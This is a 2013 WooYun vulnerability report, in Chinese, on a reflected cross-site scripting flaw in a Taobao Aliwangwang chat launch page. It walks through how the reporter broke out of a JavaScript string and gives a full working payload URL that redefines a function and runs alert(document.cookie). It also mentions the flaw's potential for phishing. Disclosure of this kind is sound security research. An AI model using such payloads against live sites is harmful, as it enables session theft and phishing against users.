当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022936

漏洞标题:某个阿里旺旺程序的启动页面反射型XSS

相关厂商:淘宝网

漏洞作者: Millet

提交时间:2013-05-05 09:41

修复时间:2013-06-19 09:42

公开时间:2013-06-19 09:42

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-05: 细节已通知厂商并且等待厂商处理中
2013-05-06: 厂商已经确认,细节仅向厂商公开
2013-05-16: 细节向核心白帽子及相关领域专家公开
2013-05-26: 细节向普通白帽子公开
2013-06-05: 细节向实习白帽子公开
2013-06-19: 细节向公众公开

简要描述:

页面有参数没有过滤,可xss。
cookie是httponly的不好拿,但是这个链接被信任且广泛使用,用来钓鱼,挂马或者干点别的什么的,还是有很大风险的。

详细说明:

浏览某个站点的时候,看到阿里旺旺的聊天链接(这里的uid被替换成了***)
http://amos1.taobao.com/msg.ww?site=cntaobao&charset=utf-8&v=2&uid=***&s=1

else.jpg


访问后查看源代码,发现有这样两句:
尝试将uid修改为含引号的字符,页面不会返回内容。
其他参数charset v s的参数均被url编码。

sendClientMsg('', '', 'cntaobao', '***', 1, '&charset=%75%74%66%2D%38&v=%32&s=%31');
setTimeout('windowClose()', 1);


0.jpg


尝试增加参数&x=123,函数变为:

1.jpg


构造了如下参数,发现js出错了,感觉有戏:
site=cntaobao&charset=utf-8&v=2&uid=***&s=1&'

3.jpg


http://amos1.taobao.com/msg.aw?site=&v=&uid=1&s=&');function%20sendClientMsg(){}alert(document.cookie);//
将执行:

sendClientMsg('', '', '', '1', 1, '&v=&s=&');
function sendClientMsg() {
}
alert(document.cookie);
//=');setTimeout('windowClose()', 1);


重新定义sendClientMsg是为了不让原来的逻辑执行;结尾加//把后面关闭窗口给注释了。

4.jpg


漏洞证明:

见描述

修复方案:

只保留需要的参数并过滤

版权声明:转载请注明来源 Millet@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-05-06 14:57

厂商回复:

非常感谢您对我们的关注与支持,该漏洞我们正在修复~

最新状态:

暂无


漏洞评价:

评论